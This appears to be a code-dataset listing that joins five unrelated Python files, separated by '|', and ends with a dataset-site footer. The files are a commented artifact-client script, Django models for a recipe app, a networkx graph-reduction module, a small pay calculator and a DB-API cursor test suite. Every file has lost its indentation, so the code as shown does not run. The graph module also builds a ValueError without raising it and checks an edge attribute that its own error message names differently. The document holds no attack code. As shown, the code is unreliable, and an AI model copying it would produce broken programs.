# for i in range(10):
# r = artifactClient.getArtifacts('plate-'+str(i), 'train-id-'+str(i))
# print(r)
# for i in range(10):
# r = artifactClient.deleteArtifacts('plate-'+str(i), 'train-id-'+str(i))
# print(r)
#r = artifactClient.createDescribeStacksArtifact("context-id-123456", "train-id-123456")
#print(r)
r = artifactClient.getArtifacts('1xDNMw2ZFhpSGDTppgyeMU', 'origin')
print(r)
|
import uuid
import os
from django.db import models
from django.contrib.auth.models import (AbstractBaseUser, BaseUserManager,
PermissionsMixin)
from django.conf import settings
def recipe_image_file_path(instance, filename):
"""Generate file path for new recipe image"""
ext = filename.split('.')[-1]
filename = f'{uuid.uuid4()}.{ext}'
return os.path.join('uploads/recipe/', filename)
class UserManager(BaseUserManager):
def create_user(self, email, password=None, **extra_fields):
'''
Creates and saves users with given email
'''
if not email:
raise ValueError('The Email must be set')
user = self.model(email=self.normalize_email(email), **extra_fields)
user.set_password(password)
user.save()
return user
def create_superuser(self, email, password, **extra_fields):
'''
Creates and saves superusers with given email
'''
user = self.create_user(email, password)
user.is_staff = True
user.is_superuser = True
user.save(using=self.db)
return user
class User(AbstractBaseUser, PermissionsMixin):
"""Custom user model that supports using emails instead of username"""
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
objects = UserManager()
USERNAME_FIELD = 'email'
def __str__(self):
return self.email
class Tag(models.Model):
"""Tag to be used for a recipe"""
name = models.CharField(max_length=255)
user = models.ForeignKey(settings.AUTH_USER_MODEL,
on_delete=models.CASCADE)
class Meta:
ordering = ["id"]
def __str__(self):
return self.name
class Ingredient(models.Model):
"""Ingredients to be used in a recipe"""
name = models.CharField(max_length=255)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
def __str__(self):
return self.name
class Recipe(models.Model):
"""Recipe Object"""
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
title = models.CharField(max_length=255)
time_minutes = models.IntegerField()
price = models.DecimalField(max_digits=5, decimal_places=2)
link = models.CharField(max_length=255, blank=True)
ingredients = models.ManyToManyField('Ingredient')
tags = models.ManyToManyField('Tag')
image = models.ImageField(null=True, upload_to=recipe_image_file_path)
def __str__(self):
return self.title
|
# -*- coding: utf-8 -*-
"""Methods to generalize any graph for its path analysis."""
import logging
from typing import Dict, Tuple, Any, List
from networkx import DiGraph, isolates
__all__ = [
'generate_reduced_graph',
]
logger = logging.getLogger(__name__)
def remove_isolated_nodes(graph: DiGraph):
"""Remove isolated nodes from the graph.
:param graph: graph to be filtered
"""
nodes = list(isolates(graph))
graph.remove_nodes_from(nodes)
def _dict_to_graph(data: Dict[str, Any]) -> Tuple[DiGraph, Dict[str, int]]:
"""Convert dictionary representation of the graph to a directed graph.
:param data: graph as a dictionary
:return: directed graph
"""
graph = DiGraph()
node2id = {}
for node, properties in data['node_list'].items():
node2id[node] = properties['id']
graph.add_node(
int(properties['id']),
name=node,
isTarget=bool(properties['isTarget'])
)
for node, adj in data['adj_list'].items():
source = int(node)
increases = adj.get('increases', [])
decreases = adj.get('decreases', [])
for n in increases:
graph.add_edge(source, n, polarity=1)
for n in decreases:
graph.add_edge(source, n, polarity=-1)
return graph, node2id
def generate_reduced_graph(graph: DiGraph, target_nodes: List[Any]) -> Tuple[DiGraph, Dict[str, int]]:
"""Generate a reduced version of a graph.
:param graph: directed graph
:param target_nodes: target nodes
:return:
"""
remove_isolated_nodes(graph)
node_list = {
f'{node}': {
'id': i,
'isTarget': True if node in target_nodes else False,
}
for i, node in enumerate(graph.nodes())
}
adj_list = {}
# Counters
num_edges = 0
count_increases = 0
count_decreases = 0
for i, node in enumerate(graph.nodes()):
increases = []
decreases = []
for neighbor in graph.neighbors(node):
relation_sign = graph[node][neighbor].get('relation')
if not relation_sign:
raise ValueError('Ensure that your graph has been loaded within the "polarity" attribute')
# Add positive relation
if relation_sign == 1:
increases.append(node_list[f'{neighbor}']['id'])
count_increases += 1
# Add negative relation
elif relation_sign == -1:
decreases.append(node_list[f'{neighbor}']['id'])
count_decreases += 1
# Raise error if it doesnt recognize the relation type
else:
ValueError(f"Unknown relation: {relation_sign}")
if increases or decreases:
adj_list[i] = {}
if increases:
adj_list[i]['increases'] = increases
if decreases:
adj_list[i]['decreases'] = decreases
num_edges += len(increases) + len(decreases)
num_nodes = len(node_list)
graph_data = {
'num_nodes': num_nodes,
'num_edges': num_edges,
'node_list': node_list,
'adj_list': adj_list
}
logger.debug(
f"Number of nodes:{num_nodes}\n"
f"Number of edges: {num_edges}\n"
f"Number of activations: {count_increases}\n"
f"Number of inhibitions: {count_decreases}\n"
)
return _dict_to_graph(graph_data)
|
#Se crean los inputs
rate = input("Enter Rate:")
hrs = input("Enter Hours:")
#Se toman los valores y se convierten en float ambos por que string y float no se pueden multiplicar directamente
pay = float(rate) * float(hrs)
#Se imprime el resultado de pay
print("Pay:",pay)
|
# encoding: utf-8
"""Shared DB-API test cases"""
from __future__ import absolute_import
from __future__ import unicode_literals
from builtins import object
from builtins import range
from future.utils import with_metaclass
from avanthive import exc
import abc
import contextlib
import functools
def with_cursor(fn):
"""Pass a cursor to the given function and handle cleanup.
The cursor is taken from ``self.connect()``.
"""
@functools.wraps(fn)
def wrapped_fn(self, *args, **kwargs):
with contextlib.closing(self.connect()) as connection:
with contextlib.closing(connection.cursor()) as cursor:
fn(self, cursor, *args, **kwargs)
return wrapped_fn
class DBAPITestCase(with_metaclass(abc.ABCMeta, object)):
@abc.abstractmethod
def connect(self):
raise NotImplementedError # pragma: no cover
@with_cursor
def test_fetchone(self, cursor):
cursor.execute('SELECT * FROM one_row')
self.assertEqual(cursor.rownumber, 0)
self.assertEqual(cursor.fetchone(), (1,))
self.assertEqual(cursor.rownumber, 1)
self.assertIsNone(cursor.fetchone())
@with_cursor
def test_fetchall(self, cursor):
cursor.execute('SELECT * FROM one_row')
self.assertEqual(cursor.fetchall(), [(1,)])
cursor.execute('SELECT a FROM many_rows ORDER BY a')
self.assertEqual(cursor.fetchall(), [(i,) for i in range(10000)])
@with_cursor
def test_null_param(self, cursor):
cursor.execute('SELECT %s FROM one_row', (None,))
self.assertEqual(cursor.fetchall(), [(None,)])
@with_cursor
def test_iterator(self, cursor):
cursor.execute('SELECT * FROM one_row')
self.assertEqual(list(cursor), [(1,)])
self.assertRaises(StopIteration, cursor.__next__)
@with_cursor
def test_description_initial(self, cursor):
self.assertIsNone(cursor.description)
@with_cursor
def test_description_failed(self, cursor):
try:
cursor.execute('blah_blah')
except exc.DatabaseError:
pass
self.assertIsNone(cursor.description)
@with_cursor
def test_bad_query(self, cursor):
def run():
cursor.execute('SELECT does_not_exist FROM this_really_does_not_exist')
cursor.fetchone()
self.assertRaises(exc.DatabaseError, run)
@with_cursor
def test_concurrent_execution(self, cursor):
cursor.execute('SELECT * FROM one_row')
cursor.execute('SELECT * FROM one_row')
self.assertEqual(cursor.fetchall(), [(1,)])
@with_cursor
def test_executemany(self, cursor):
for length in 1, 2:
cursor.executemany(
'SELECT %(x)d FROM one_row',
[{'x': i} for i in range(1, length + 1)]
)
self.assertEqual(cursor.fetchall(), [(length,)])
@with_cursor
def test_executemany_none(self, cursor):
cursor.executemany('should_never_get_used', [])
self.assertIsNone(cursor.description)
self.assertRaises(exc.ProgrammingError, cursor.fetchone)
@with_cursor
def test_fetchone_no_data(self, cursor):
self.assertRaises(exc.ProgrammingError, cursor.fetchone)
@with_cursor
def test_fetchmany(self, cursor):
cursor.execute('SELECT * FROM many_rows LIMIT 15')
self.assertEqual(cursor.fetchmany(0), [])
self.assertEqual(len(cursor.fetchmany(10)), 10)
self.assertEqual(len(cursor.fetchmany(10)), 5)
@with_cursor
def test_arraysize(self, cursor):
cursor.arraysize = 5
cursor.execute('SELECT * FROM many_rows LIMIT 20')
self.assertEqual(len(cursor.fetchmany()), 5)
@with_cursor
def test_polling_loop(self, cursor):
"""Try to trigger the polling logic in fetchone()"""
cursor._poll_interval = 0
cursor.execute('SELECT COUNT(*) FROM many_rows')
self.assertEqual(cursor.fetchone(), (10000,))
@with_cursor
def test_no_params(self, cursor):
cursor.execute("SELECT '%(x)s' FROM one_row")
self.assertEqual(cursor.fetchall(), [('%(x)s',)])
def test_escape(self):
"""Verify that funny characters can be escaped as strings and SELECTed back"""
bad_str = '''`~!@#$%^&*()_+-={}[]|\\;:'",./<>?\n\r\t '''
self.run_escape_case(bad_str)
@with_cursor
def run_escape_case(self, cursor, bad_str):
cursor.execute(
'SELECT %d, %s FROM one_row',
(1, bad_str)
)
self.assertEqual(cursor.fetchall(), [(1, bad_str,)])
cursor.execute(
'SELECT %(a)d, %(b)s FROM one_row',
{'a': 1, 'b': bad_str}
)
self.assertEqual(cursor.fetchall(), [(1, bad_str)])
@with_cursor
def test_invalid_params(self, cursor):
self.assertRaises(exc.ProgrammingError, lambda: cursor.execute('', 'hi'))
self.assertRaises(exc.ProgrammingError, lambda: cursor.execute('', [object]))
def test_open_close(self):
with contextlib.closing(self.connect()):
pass
with contextlib.closing(self.connect()) as connection:
with contextlib.closing(connection.cursor()):
pass
@with_cursor
def test_unicode(self, cursor):
unicode_str = "王兢"
cursor.execute(
'SELECT %s FROM one_row',
(unicode_str,)
)
self.assertEqual(cursor.fetchall(), [(unicode_str,)])
@with_cursor
def test_null(self, cursor):
cursor.execute('SELECT null FROM many_rows')
self.assertEqual(cursor.fetchall(), [(None,)] * 10000)
cursor.execute('SELECT IF(a % 11 = 0, null, a) FROM many_rows')
self.assertEqual(cursor.fetchall(), [(None if a % 11 == 0 else a,) for a in range(10000)])
@with_cursor
def test_sql_where_in(self, cursor):
cursor.execute('SELECT * FROM many_rows where a in %s', ([1, 2, 3],))
self.assertEqual(len(cursor.fetchall()), 3)
cursor.execute('SELECT * FROM many_rows where b in %s limit 10',
(['blah'],))
self.assertEqual(len(cursor.fetchall()), 10)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.